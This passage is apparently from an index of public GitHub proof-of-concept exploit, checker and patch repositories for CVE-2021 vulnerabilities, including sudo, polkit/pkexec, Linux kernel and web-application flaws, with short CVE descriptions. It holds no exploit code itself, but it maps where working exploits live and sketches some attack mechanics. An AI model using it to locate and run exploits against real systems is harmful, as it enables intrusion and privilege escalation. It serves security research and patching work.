- [cuongtop4598/CVE-2021-3129-Script](https://github.com/cuongtop4598/CVE-2021-3129-Script)
- [joshuavanderpoll/CVE-2021-3129](https://github.com/joshuavanderpoll/CVE-2021-3129)
- [shadowabi/Laravel-CVE-2021-3129](https://github.com/shadowabi/Laravel-CVE-2021-3129)
- [JacobEbben/CVE-2021-3129](https://github.com/JacobEbben/CVE-2021-3129)
- [hupe1980/CVE-2021-3129](https://github.com/hupe1980/CVE-2021-3129)
- [0nion1/CVE-2021-3129](https://github.com/0nion1/CVE-2021-3129)
- [MadExploits/Laravel-debug-Checker](https://github.com/MadExploits/Laravel-debug-Checker)
- [ajisai-babu/CVE-2021-3129-exp](https://github.com/ajisai-babu/CVE-2021-3129-exp)
- [keyuan15/CVE-2021-3129](https://github.com/keyuan15/CVE-2021-3129)
- [qaisarafridi/cve-2021-3129](https://github.com/qaisarafridi/cve-2021-3129)
- [Zoo1sondv/CVE-2021-3129](https://github.com/Zoo1sondv/CVE-2021-3129)
- [miko550/CVE-2021-3129](https://github.com/miko550/CVE-2021-3129)
- [wmasday/CVE-2021-3129](https://github.com/wmasday/CVE-2021-3129)
- [banyaksepuh/Mass-CVE-2021-3129-Scanner](https://github.com/banyaksepuh/Mass-CVE-2021-3129-Scanner)
- [Axianke/CVE-2021-3129](https://github.com/Axianke/CVE-2021-3129)
- [cc3305/CVE-2021-3129](https://github.com/cc3305/CVE-2021-3129)
- [piperpwn/CVE-2021-3129-](https://github.com/piperpwn/CVE-2021-3129-)
- [0x0d3ad/CVE-2021-3129](https://github.com/0x0d3ad/CVE-2021-3129)
- [GodOfServer/CVE-2021-3129](https://github.com/GodOfServer/CVE-2021-3129)

### CVE-2021-3130 (2021-01-20)

Within the Open-AudIT up to version 3.5.3 application, the web interface hides SSH secrets, Windows passwords, and SNMP strings from users using HTML 'password field' obfuscation. By using Developer tools or similar, it is possible to change the obfuscation so that the credentials are visible.

- [jet-pentest/CVE-2021-3130](https://github.com/jet-pentest/CVE-2021-3130)

### CVE-2021-3131 (2021-01-13)

The Web server in 1C:Enterprise 8 before 8.3.17.1851 sends base64 encoded credentials in the creds URL parameter.

- [jet-pentest/CVE-2021-3131](https://github.com/jet-pentest/CVE-2021-3131)

### CVE-2021-3138 (2021-01-14)

In Discourse 2.7.0 through beta1, a rate-limit bypass leads to a bypass of the 2FA requirement for certain forms.

- [Mesh3l911/CVE-2021-3138](https://github.com/Mesh3l911/CVE-2021-3138)

### CVE-2021-3156 (2021-01-26)

Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via "sudoedit -s" and a command-line argument that ends with a single backslash character.

- [mr-r3b00t/CVE-2021-3156](https://github.com/mr-r3b00t/CVE-2021-3156)
- [nexcess/sudo_cve-2021-3156](https://github.com/nexcess/sudo_cve-2021-3156)
- [reverse-ex/CVE-2021-3156](https://github.com/reverse-ex/CVE-2021-3156)
- [unauth401/CVE-2021-3156](https://github.com/unauth401/CVE-2021-3156)
- [ymrsmns/CVE-2021-3156](https://github.com/ymrsmns/CVE-2021-3156)
- [elbee-cyber/CVE-2021-3156-PATCHER](https://github.com/elbee-cyber/CVE-2021-3156-PATCHER)
- [kernelzeroday/CVE-2021-3156-Baron-Samedit](https://github.com/kernelzeroday/CVE-2021-3156-Baron-Samedit)
- [yaunsky/cve-2021-3156](https://github.com/yaunsky/cve-2021-3156)
- [baka9moe/CVE-2021-3156-Exp](https://github.com/baka9moe/CVE-2021-3156-Exp)
- [ph4ntonn/CVE-2021-3156](https://github.com/ph4ntonn/CVE-2021-3156)
- [binw2018/CVE-2021-3156-SCRIPT](https://github.com/binw2018/CVE-2021-3156-SCRIPT)
- [freeFV/CVE-2021-3156](https://github.com/freeFV/CVE-2021-3156)
- [mbcrump/CVE-2021-3156](https://github.com/mbcrump/CVE-2021-3156)
- [stong/CVE-2021-3156](https://github.com/stong/CVE-2021-3156)
- [nobodyatall648/CVE-2021-3156](https://github.com/nobodyatall648/CVE-2021-3156)
- [blasty/CVE-2021-3156](https://github.com/blasty/CVE-2021-3156)
- [teamtopkarl/CVE-2021-3156](https://github.com/teamtopkarl/CVE-2021-3156)
- [Q4n/CVE-2021-3156](https://github.com/Q4n/CVE-2021-3156)
- [kal1gh0st/CVE-2021-3156](https://github.com/kal1gh0st/CVE-2021-3156)
- [apogiatzis/docker-CVE-2021-3156](https://github.com/apogiatzis/docker-CVE-2021-3156)
- [voidlsd/CVE-2021-3156](https://github.com/voidlsd/CVE-2021-3156)
- [Ashish-dawani/CVE-2021-3156-Patch](https://github.com/Ashish-dawani/CVE-2021-3156-Patch)
- [SantiagoSerrao/ScannerCVE-2021-3156](https://github.com/SantiagoSerrao/ScannerCVE-2021-3156)
- [DanielAzulayy/CTF-2021](https://github.com/DanielAzulayy/CTF-2021)
- [cdeletre/Serpentiel-CVE-2021-3156](https://github.com/cdeletre/Serpentiel-CVE-2021-3156)
- [dinhbaouit/CVE-2021-3156](https://github.com/dinhbaouit/CVE-2021-3156)
- [CptGibbon/CVE-2021-3156](https://github.com/CptGibbon/CVE-2021-3156)
- [perlun/sudo-1.8.3p1-patched](https://github.com/perlun/sudo-1.8.3p1-patched)
- [1N53C/CVE-2021-3156-PoC](https://github.com/1N53C/CVE-2021-3156-PoC)
- [0xdevil/CVE-2021-3156](https://github.com/0xdevil/CVE-2021-3156)
- [gmldbd94/cve-2021-3156](https://github.com/gmldbd94/cve-2021-3156)
- [jm33-m0/CVE-2021-3156](https://github.com/jm33-m0/CVE-2021-3156)
- [Rvn0xsy/CVE-2021-3156-plus](https://github.com/Rvn0xsy/CVE-2021-3156-plus)
- [r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability](https://github.com/r3k4t/how-to-solve-sudo-heap-based-bufferoverflow-vulnerability)
- [oneoy/CVE-2021-3156](https://github.com/oneoy/CVE-2021-3156)
- [worawit/CVE-2021-3156](https://github.com/worawit/CVE-2021-3156)
- [lmol/CVE-2021-3156](https://github.com/lmol/CVE-2021-3156)
- [BearCat4/CVE-2021-3156](https://github.com/BearCat4/CVE-2021-3156)
- [ZTK-009/CVE-2021-3156](https://github.com/ZTK-009/CVE-2021-3156)
- [capturingcats/CVE-2021-3156](https://github.com/capturingcats/CVE-2021-3156)
- [LiveOverflow/pwnedit](https://github.com/LiveOverflow/pwnedit)
- [ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build](https://github.com/ajtech-hue/CVE-2021-3156-Mitigation-ShellScript-Build)
- [donghyunlee00/CVE-2021-3156](https://github.com/donghyunlee00/CVE-2021-3156)
- [TheFlash2k/CVE-2021-3156](https://github.com/TheFlash2k/CVE-2021-3156)
- [Exodusro/CVE-2021-3156](https://github.com/Exodusro/CVE-2021-3156)
- [CyberCommands/CVE-2021-3156](https://github.com/CyberCommands/CVE-2021-3156)
- [0x7183/CVE-2021-3156](https://github.com/0x7183/CVE-2021-3156)
- [redhawkeye/sudo-exploit](https://github.com/redhawkeye/sudo-exploit)
- [d3c3ptic0n/CVE-2021-3156](https://github.com/d3c3ptic0n/CVE-2021-3156)
- [musergi/CVE-2021-3156](https://github.com/musergi/CVE-2021-3156)
- [halissha/CVE-2021-3156](https://github.com/halissha/CVE-2021-3156)
- [sharkmoos/Baron-Samedit](https://github.com/sharkmoos/Baron-Samedit)
- [chenaotian/CVE-2021-3156](https://github.com/chenaotian/CVE-2021-3156)
- [ret2basic/SudoScience](https://github.com/ret2basic/SudoScience)
- [puckiestyle/CVE-2021-3156](https://github.com/puckiestyle/CVE-2021-3156)
- [barebackbandit/CVE-2021-3156](https://github.com/barebackbandit/CVE-2021-3156)
- [RodricBr/CVE-2021-3156](https://github.com/RodricBr/CVE-2021-3156)
- [ypl6/heaplens](https://github.com/ypl6/heaplens)
- [q77190858/CVE-2021-3156](https://github.com/q77190858/CVE-2021-3156)
- [arvindshima/CVE-2021-3156](https://github.com/arvindshima/CVE-2021-3156)
- [Mhackiori/CVE-2021-3156](https://github.com/Mhackiori/CVE-2021-3156)
- [PhuketIsland/CVE-2021-3156-centos7](https://github.com/PhuketIsland/CVE-2021-3156-centos7)
- [0x4ndy/clif](https://github.com/0x4ndy/clif)
- [hycheng15/CVE-2021-3156](https://github.com/hycheng15/CVE-2021-3156)
- [mutur4/CVE-2021-3156](https://github.com/mutur4/CVE-2021-3156)
- [PurpleOzone/PE_CVE-CVE-2021-3156](https://github.com/PurpleOzone/PE_CVE-CVE-2021-3156)
- [asepsaepdin/CVE-2021-3156](https://github.com/asepsaepdin/CVE-2021-3156)
- [DDayLuong/CVE-2021-3156](https://github.com/DDayLuong/CVE-2021-3156)
- [DASICS-ICT/DASICS-CVE-2021-3156](https://github.com/DASICS-ICT/DASICS-CVE-2021-3156)
- [wurwur/CVE-2021-3156](https://github.com/wurwur/CVE-2021-3156)
- [SamTruss/LMU-CVE-2021-3156](https://github.com/SamTruss/LMU-CVE-2021-3156)
- [lypd0/CVE-2021-3156-checker](https://github.com/lypd0/CVE-2021-3156-checker)
- [Typical0day/CVE-2021-3156](https://github.com/Typical0day/CVE-2021-3156)
- [acidburn2049/CVE-2021-3156](https://github.com/acidburn2049/CVE-2021-3156)

### CVE-2021-3157
- [CrackerCat/cve-2021-3157](https://github.com/CrackerCat/cve-2021-3157)

### CVE-2021-3164 (2021-01-21)

ChurchRota 2.6.4 is vulnerable to authenticated remote code execution. The user does not need to have file upload permission in order to upload and execute an arbitrary file via a POST request to resources.php.

- [rmccarth/cve-2021-3164](https://github.com/rmccarth/cve-2021-3164)

### CVE-2021-3166 (2021-01-18)

An issue was discovered on ASUS DSL-N14U-B1 1.1.2.3_805 devices. An attacker can upload arbitrary file content as a firmware update when the filename Settings_DSL-N14U-B1.trx is used. Once this file is loaded, shutdown measures on a wide range of services are triggered as if it were a real update, resulting in a persistent outage of those services.

- [kaisersource/CVE-2021-3166](https://github.com/kaisersource/CVE-2021-3166)

### CVE-2021-3229 (2021-02-05)

Denial of service in ASUSWRT ASUS RT-AX3000 firmware versions 3.0.0.4.384_10177 and earlier versions allows an attacker to disrupt the use of device setup services via continuous login error.

- [fullbbadda1208/CVE-2021-3229](https://github.com/fullbbadda1208/CVE-2021-3229)

### CVE-2021-3279 (2021-07-19)

sz.chat version 4 allows injection of web scripts and HTML in the message box.

- [rafaelchriss/CVE-2021-3279](https://github.com/rafaelchriss/CVE-2021-3279)

### CVE-2021-3281 (2021-02-02)

In Django 2.2 before 2.2.18, 3.0 before 3.0.12, and 3.1 before 3.1.6, the django.utils.archive.extract method (used by "startapp --template" and "startproject --template") allows directory traversal via an archive with absolute paths or relative paths with dot segments.

- [lwzSoviet/CVE-2021-3281](https://github.com/lwzSoviet/CVE-2021-3281)

### CVE-2021-3291 (2021-01-26)

Zen Cart 1.5.7b allows admins to execute arbitrary OS commands by inspecting an HTML radio input element (within the modules edit page) and inserting a command.

- [ImHades101/CVE-2021-3291](https://github.com/ImHades101/CVE-2021-3291)

### CVE-2021-3310 (2021-03-10)

Western Digital My Cloud OS 5 devices before 5.10.122 mishandle Symbolic Link Following on SMB and AFP shares. This can lead to code execution and information disclosure (by reading local files).

- [piffd0s/CVE-2021-3310](https://github.com/piffd0s/CVE-2021-3310)

### CVE-2021-3317 (2021-01-26)

KLog Server through 2.4.1 allows authenticated command injection. async.php calls shell_exec() on the original value of the source parameter.

- [Al1ex/CVE-2021-3317](https://github.com/Al1ex/CVE-2021-3317)

### CVE-2021-3345 (2021-01-29)

_gcry_md_block_write in cipher/hash-common.c in Libgcrypt version 1.9.0 has a heap-based buffer overflow when the digest final function sets a large count value. It is recommended to upgrade to 1.9.1 or later.

- [MLGRadish/CVE-2021-3345](https://github.com/MLGRadish/CVE-2021-3345)
- [SpiralBL0CK/CVE-2021-3345](https://github.com/SpiralBL0CK/CVE-2021-3345)

### CVE-2021-3347 (2021-01-29)

An issue was discovered in the Linux kernel through 5.10.11. PI futexes have a kernel stack use-after-free during fault handling, allowing local users to execute code in the kernel, aka CID-34b1a1ce1458.

- [nanopathi/linux-4.19.72_CVE-2021-3347](https://github.com/nanopathi/linux-4.19.72_CVE-2021-3347)

### CVE-2021-3360
- [tcbutler320/CVE-2021-3360](https://github.com/tcbutler320/CVE-2021-3360)

### CVE-2021-3378 (2021-02-01)

FortiLogger 4.4.2.2 is affected by Arbitrary File Upload by sending a "Content-Type: image/png" header to Config/SaveUploadedHotspotLogoFile and then visiting Assets/temp/hotspot/img/logohotspot.asp.

- [erberkan/fortilogger_arbitrary_fileupload](https://github.com/erberkan/fortilogger_arbitrary_fileupload)

### CVE-2021-3395 (2021-02-02)

A cross-site scripting (XSS) vulnerability in Pryaniki 6.44.3 allows remote authenticated users to upload an arbitrary file. The JavaScript code will execute when someone visits the attachment.

- [jet-pentest/CVE-2021-3395](https://github.com/jet-pentest/CVE-2021-3395)

### CVE-2021-3438 (2021-05-20)

A potential buffer overflow in the software drivers for certain HP LaserJet products and Samsung product printers could lead to an escalation of privilege.

- [TobiasS1402/CVE-2021-3438](https://github.com/TobiasS1402/CVE-2021-3438)
- [CrackerCat/CVE-2021-3438](https://github.com/CrackerCat/CVE-2021-3438)

### CVE-2021-3441 (2021-10-29)

A potential security vulnerability has been identified for the HP OfficeJet 7110 Wide Format ePrinter that enables Cross-Site Scripting (XSS).

- [tcbutler320/CVE-2021-3441-check](https://github.com/tcbutler320/CVE-2021-3441-check)

### CVE-2021-3449 (2021-03-25)

An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).

- [riptl/cve-2021-3449](https://github.com/riptl/cve-2021-3449)

### CVE-2021-3490 (2021-06-04)

The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e ("bpf: Fix alu32 const subreg bound tracking on bitwise operations") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 ("bpf: Verifier, do explicit ALU32 bounds tracking") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 ("bpf:Fix a verifier failure with xor") (5.10-rc1).

- [chompie1337/Linux_LPE_eBPF_CVE-2021-3490](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490)
- [pivik271/CVE-2021-3490](https://github.com/pivik271/CVE-2021-3490)

### CVE-2021-3492 (2021-04-17)

Shiftfs, an out-of-tree stacking file system included in Ubuntu Linux kernels, did not properly handle faults occurring during copy_from_user(). These could lead to either a double-free situation or memory not being freed at all. An attacker could use this to cause a denial of service (kernel memory exhaustion) or gain privileges via executing arbitrary code. AKA ZDI-CAN-13562.

- [synacktiv/CVE-2021-3492](https://github.com/synacktiv/CVE-2021-3492)

### CVE-2021-3493 (2021-04-17)

The overlayfs implementation in the Linux kernel did not properly validate, with respect to user namespaces, the setting of file capabilities on files in an underlying file system. Due to the combination of unprivileged user namespaces along with a patch carried in the Ubuntu kernel to allow unprivileged overlay mounts, an attacker could use this to gain elevated privileges.

- [briskets/CVE-2021-3493](https://github.com/briskets/CVE-2021-3493)
- [oneoy/CVE-2021-3493](https://github.com/oneoy/CVE-2021-3493)
- [Abdennour-py/CVE-2021-3493](https://github.com/Abdennour-py/CVE-2021-3493)
- [inspiringz/CVE-2021-3493](https://github.com/inspiringz/CVE-2021-3493)
- [derek-turing/CVE-2021-3493](https://github.com/derek-turing/CVE-2021-3493)
- [cerodah/overlayFS-CVE-2021-3493](https://github.com/cerodah/overlayFS-CVE-2021-3493)
- [puckiestyle/CVE-2021-3493](https://github.com/puckiestyle/CVE-2021-3493)
- [fei9747/CVE-2021-3493](https://github.com/fei9747/CVE-2021-3493)
- [pmihsan/OverlayFS-CVE-2021-3493](https://github.com/pmihsan/OverlayFS-CVE-2021-3493)
- [smallkill/CVE-2021-3493](https://github.com/smallkill/CVE-2021-3493)
- [ptkhai15/OverlayFS---CVE-2021-3493](https://github.com/ptkhai15/OverlayFS---CVE-2021-3493)
- [iamz24/CVE-2021-3493_CVE-2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE-2022-3357)
- [fathallah17/OverlayFS-CVE-2021-3493](https://github.com/fathallah17/OverlayFS-CVE-2021-3493)

### CVE-2021-3516 (2021-06-01)

There's a flaw in libxml2's xmllint in versions before 2.9.11. An attacker who is able to submit a crafted file to be processed by xmllint could trigger a use-after-free. The greatest impact of this flaw is to confidentiality, integrity, and availability.

- [dja2TaqkGEEfA45/CVE-2021-3516](https://github.com/dja2TaqkGEEfA45/CVE-2021-3516)

### CVE-2021-3560 (2022-02-16)

It was found that polkit could be tricked into bypassing the credential checks for D-Bus requests, elevating the privileges of the requestor to the root user. This flaw could be used by an unprivileged local attacker to, for example, create a new local administrator. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

- [aancw/polkit-auto-exploit](https://github.com/aancw/polkit-auto-exploit)
- [swapravo/polkadots](https://github.com/swapravo/polkadots)
- [hakivvi/CVE-2021-3560](https://github.com/hakivvi/CVE-2021-3560)
- [iSTAR-Lab/CVE-2021-3560_PoC](https://github.com/iSTAR-Lab/CVE-2021-3560_PoC)
- [secnigma/CVE-2021-3560-Polkit-Privilege-Esclation](https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation)
- [curtishoughton/CVE-2021-3560](https://github.com/curtishoughton/CVE-2021-3560)
- [Almorabea/Polkit-exploit](https://github.com/Almorabea/Polkit-exploit)
- [AssassinUKG/Polkit-CVE-2021-3560](https://github.com/AssassinUKG/Polkit-CVE-2021-3560)
- [cpu0x00/CVE-2021-3560](https://github.com/cpu0x00/CVE-2021-3560)
- [BizarreLove/CVE-2021-3560](https://github.com/BizarreLove/CVE-2021-3560)
- [0dayNinja/CVE-2021-3560](https://github.com/0dayNinja/CVE-2021-3560)
- [admin-079/CVE-2021-3560](https://github.com/admin-079/CVE-2021-3560)
- [chenaotian/CVE-2021-3560](https://github.com/chenaotian/CVE-2021-3560)
- [NeonWhiteRabbit/CVE-2021-3560](https://github.com/NeonWhiteRabbit/CVE-2021-3560)
- [f4T1H21/CVE-2021-3560-Polkit-DBus](https://github.com/f4T1H21/CVE-2021-3560-Polkit-DBus)
- [innxrmxst/CVE-2021-3560](https://github.com/innxrmxst/CVE-2021-3560)
- [RicterZ/CVE-2021-3560-Authentication-Agent](https://github.com/RicterZ/CVE-2021-3560-Authentication-Agent)
- [WinMin/CVE-2021-3560](https://github.com/WinMin/CVE-2021-3560)
- [UNICORDev/exploit-CVE-2021-3560](https://github.com/UNICORDev/exploit-CVE-2021-3560)
- [asepsaepdin/CVE-2021-3560](https://github.com/asepsaepdin/CVE-2021-3560)
- [pashayogi/ROOT-CVE-2021-3560](https://github.com/pashayogi/ROOT-CVE-2021-3560)
- [TieuLong21Prosper/CVE-2021-3560](https://github.com/TieuLong21Prosper/CVE-2021-3560)
- [LucasPDiniz/CVE-2021-3560](https://github.com/LucasPDiniz/CVE-2021-3560)
- [markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation](https://github.com/markyu0401/CVE-2021-3560-Polkit-Privilege-Escalation)
- [Kyyomaa/CVE-2021-3560-EXPLOIT](https://github.com/Kyyomaa/CVE-2021-3560-EXPLOIT)

### CVE-2021-3572 (2021-11-10)

A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. This is fixed in python-pip version 21.1.

- [frenzymadness/CVE-2021-3572](https://github.com/frenzymadness/CVE-2021-3572)

### CVE-2021-3625 (2021-10-05)

Buffer overflow in Zephyr USB DFU DNLOAD. Zephyr versions >= v2.5.0 contain Heap-based Buffer Overflow (CWE-122). For more information, see https://github.com/zephyrproject-rtos/zephyr/security/advisories/GHSA-c3gr-hgvr-f363

- [szymonh/zephyr_cve-2021-3625](https://github.com/szymonh/zephyr_cve-2021-3625)

### CVE-2021-3656 (2022-03-04)

A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested guest (L2). Due to improper validation of the "virt_ext" field, this issue could allow a malicious L1 to disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak of sensitive data or potential guest-to-host escape.

- [rami08448/CVE-2021-3656-Demo](https://github.com/rami08448/CVE-2021-3656-Demo)

### CVE-2021-3679 (2021-08-05)

A lack of CPU resources in the Linux kernel tracing module functionality in versions prior to 5.14-rc3 was found in the way a user uses the trace ring buffer in a specific way. Only privileged local users (with the CAP_SYS_ADMIN capability) could use this flaw to starve the resources, causing a denial of service.

- [aegistudio/RingBufferDetonator](https://github.com/aegistudio/RingBufferDetonator)

### CVE-2021-3707 (2021-08-16)

D-Link router DSL-2750U with firmware vME1.16 or prior versions is vulnerable to unauthorized configuration modification. An unauthenticated attacker on the local network may exploit this, with CVE-2021-3708, to execute any OS commands on the vulnerable device.

- [HadiMed/DSL-2750U-Full-chain](https://github.com/HadiMed/DSL-2750U-Full-chain)

### CVE-2021-3749 (2021-08-31)

axios is vulnerable to Inefficient Regular Expression Complexity.

- [T-Guerrero/axios-redos](https://github.com/T-Guerrero/axios-redos)

### CVE-2021-3754 (2022-08-26)

A flaw was found in keycloak where an attacker is able to register with a username that is the same as the email ID of any existing user. This may cause trouble for that user in receiving the password recovery email if they forget their password.

- [7Ragnarok7/CVE-2021-3754](https://github.com/7Ragnarok7/CVE-2021-3754)

### CVE-2021-3773 (2022-02-16)

A flaw in netfilter could allow a network-connected attacker to infer openvpn connection endpoint information for further use in traditional network attacks.

- [d0rb/CVE-2021-3773](https://github.com/d0rb/CVE-2021-3773)

### CVE-2021-3864 (2022-08-26)

A flaw was found in the way the dumpable flag setting was handled when certain SUID binaries executed their descendants. The prerequisite is a SUID binary that sets the real UID equal to the effective UID, and the real GID equal to the effective GID. The descendant will then have a dumpable value set to 1. As a result, if the descendant process crashes and core_pattern is set to a relative value, its core dump is stored in the current directory with uid:gid permissions. An unprivileged local user with an eligible root SUID binary could use this flaw to place core dumps into root-owned directories, potentially resulting in escalation of privileges.

- [walac/cve-2021-3864](https://github.com/walac/cve-2021-3864)

### CVE-2021-3899 (2024-06-03)

There is a race condition in the 'replaced executable' detection that, with the correct local configuration, allows an attacker to execute arbitrary code as root.

- [liumuqing/CVE-2021-3899_PoC](https://github.com/liumuqing/CVE-2021-3899_PoC)

### CVE-2021-3929 (2022-08-25)

A DMA reentrancy issue was found in the NVM Express Controller (NVME) emulation in QEMU. This CVE is similar to CVE-2021-3750 and, just like it, when the reentrancy write triggers the reset function nvme_ctrl_reset(), data structs will be freed leading to a use-after-free issue. A malicious guest could use this flaw to crash the QEMU process on the host, resulting in a denial of service condition or, potentially, executing arbitrary code within the context of the QEMU process on the host.

- [QiuhaoLi/CVE-2021-3929-3947](https://github.com/QiuhaoLi/CVE-2021-3929-3947)

### CVE-2021-3972 (2022-04-22)

A potential vulnerability in a driver used during the manufacturing process on some consumer Lenovo Notebook devices' BIOS, which was mistakenly not deactivated, may allow an attacker with elevated privileges to modify the secure boot setting by modifying an NVRAM variable.

- [killvxk/CVE-2021-3972](https://github.com/killvxk/CVE-2021-3972)

### CVE-2021-4034 (2022-01-28)

A local privilege escalation vulnerability was found in polkit's pkexec utility. The pkexec application is a setuid tool designed to allow unprivileged users to run commands as privileged users according to predefined policies. The current version of pkexec doesn't handle the calling parameter count correctly and ends up trying to execute environment variables as commands. An attacker can leverage this by crafting environment variables in such a way that it induces pkexec to execute arbitrary code. When successfully executed, the attack can cause a local privilege escalation, giving unprivileged users administrative rights on the target machine.

- [ryaagard/CVE-2021-4034](https://github.com/ryaagard/CVE-2021-4034)
- [berdav/CVE-2021-4034](https://github.com/berdav/CVE-2021-4034)
- [clubby789/CVE-2021-4034](https://github.com/clubby789/CVE-2021-4034)
- [gbrsh/CVE-2021-4034](https://github.com/gbrsh/CVE-2021-4034)
- [arthepsy/CVE-2021-4034](https://github.com/arthepsy/CVE-2021-4034)
- [JohnHammond/CVE-2021-4034](https://github.com/JohnHammond/CVE-2021-4034)
- [Audiobahn/CVE-2021-4034](https://github.com/Audiobahn/CVE-2021-4034)
- [dzonerzy/poc-cve-2021-4034](https://github.com/dzonerzy/poc-cve-2021-4034)
- [nikaiw/CVE-2021-4034](https://github.com/nikaiw/CVE-2021-4034)
- [mebeim/CVE-2021-4034](https://github.com/mebeim/CVE-2021-4034)
- [Ayrx/CVE-2021-4034](https://github.com/Ayrx/CVE-2021-4034)
- [Y3A/CVE-2021-4034](https://github.com/Y3A/CVE-2021-4034)
- [An00bRektn/CVE-2021-4034](https://github.com/An00bRektn/CVE-2021-4034)
- [ayypril/CVE-2021-4034](https://github.com/ayypril/CVE-2021-4034)
- [wongwaituck/CVE-2021-4034](https://github.com/wongwaituck/CVE-2021-4034)
- [0x05a/my-cve-2021-4034-poc](https://github.com/0x05a/my-cve-2021-4034-poc)
- [silocityit/cve-2021-4034-playground](https://github.com/silocityit/cve-2021-4034-playground)
- [zhzyker/CVE-2021-4034](https://github.com/zhzyker/CVE-2021-4034)
- [J0hnbX/CVE-2021-4034-new](https://github.com/J0hnbX/CVE-2021-4034-new)
- [Immersive-Labs-Sec/CVE-2021-4034](https://github.com/Immersive-Labs-Sec/CVE-2021-4034)
- [kimusan/pkwner](https://github.com/kimusan/pkwner)
- [N1et/CVE-2021-4034](https://github.com/N1et/CVE-2021-4034)
- [Nero22k/CVE-2021-4034](https://github.com/Nero22k/CVE-2021-4034)
- [LukeGix/CVE-2021-4034](https://github.com/LukeGix/CVE-2021-4034)
- [aus-mate/CVE-2021-4034-POC](https://github.com/aus-mate/CVE-2021-4034-POC)
- [chenaotian/CVE-2021-4034](https://github.com/chenaotian/CVE-2021-4034)
- [moldabekov/CVE-2021-4034](https://github.com/moldabekov/CVE-2021-4034)
- [jostmart/-CVE-2021-4034](https://github.com/jostmart/-CVE-2021-4034)
- [c3l3si4n/pwnkit](https://github.com/c3l3si4n/pwnkit)
- [h3xcr4ck3r/CVE-2021-4034](https://github.com/h3xcr4ck3r/CVE-2021-4034)
- [ly4k/PwnKit](https://github.com/ly4k/PwnKit)
- [san3ncrypt3d/CVE-2021-4034-POC](https://github.com/san3ncrypt3d/CVE-2021-4034-POC)
- [fdellwing/CVE-2021-4034](https://github.com/fdellwing/CVE-2021-4034)
- [xcanwin/CVE-2021-4034-UniontechOS](https://github.com/xcanwin/CVE-2021-4034-UniontechOS)
- [azminawwar/CVE-2021-4034](https://github.com/azminawwar/CVE-2021-4034)
- [PeterGottesman/pwnkit-exploit](https://github.com/PeterGottesman/pwnkit-exploit)
- [sunny0day/CVE-2021-4034](https://github.com/sunny0day/CVE-2021-4034)
- [artemis-mike/cve-2021-4034](https://github.com/artemis-mike/cve-2021-4034)
- [whokilleddb/CVE-2021-4034](https://github.com/whokilleddb/CVE-2021-4034)
- [dadvlingd/CVE-2021-4034](https://github.com/dadvlingd/CVE-2021-4034)
- [zcrosman/cve-2021-4034](https://github.com/zcrosman/cve-2021-4034)
- [robemmerson/CVE-2021-4034](https://github.com/robemmerson/CVE-2021-4034)
- [joeammond/CVE-2021-4034](https://github.com/joeammond/CVE-2021-4034)
- [luijait/PwnKit-Exploit](https://github.com/luijait/PwnKit-Exploit)
- [Anonymous-Family/CVE-2021-4034](https://github.com/Anonymous-Family/CVE-2021-4034)
- [phvilasboas/CVE-2021-4034](https://github.com/phvilasboas/CVE-2021-4034)
- [hackingyseguridad/CVE-2021-4034](https://github.com/hackingyseguridad/CVE-2021-4034)
- [vilasboasph/CVE-2021-4034](https://github.com/vilasboasph/CVE-2021-4034)
- [nobelh/CVE-2021-4034](https://github.com/nobelh/CVE-2021-4034)
- [callrbx/pkexec-lpe-poc](https://github.com/callrbx/pkexec-lpe-poc)
- [ch4rum/CVE-2021-4034](https://github.com/ch4rum/CVE-2021-4034)
- [cd80-ctf/CVE-2021-4034](https://github.com/cd80-ctf/CVE-2021-4034)
- [Al1ex/CVE-2021-4034](https://github.com/Al1ex/CVE-2021-4034)
- [ashutoshrohilla/CVE-2021-4034](https://github.com/ashutoshrohilla/CVE-2021-4034)
- [nikip72/CVE-2021-4034](https://github.com/nikip72/CVE-2021-4034)
- [NiS3x/CVE-2021-4034](https://github.com/NiS3x/CVE-2021-4034)
- [thatstraw/CVE-2021-4034](https://github.com/thatstraw/CVE-2021-4034)
- [luckythandel/CVE-2021-4034](https://github.com/luckythandel/CVE-2021-4034)
- [Plethore/CVE-2021-4034](https://github.com/Plethore/CVE-2021-4034)
- [evdenis/lsm_bpf_check_argc0](https://github.com/evdenis/lsm_bpf_check_argc0)
- [tahaafarooq/poppy](https://github.com/tahaafarooq/poppy)
- [DosAmp/pkwned](https://github.com/DosAmp/pkwned)
- [PwnFunction/CVE-2021-4034](https://github.com/PwnFunction/CVE-2021-4034)
- [locksec/CVE-2021-4034](https://github.com/locksec/CVE-2021-4034)
- [deoxykev/CVE-2021-4034-Rust](https://github.com/deoxykev/CVE-2021-4034-Rust)
- [c3c/CVE-2021-4034](https://github.com/c3c/CVE-2021-4034)
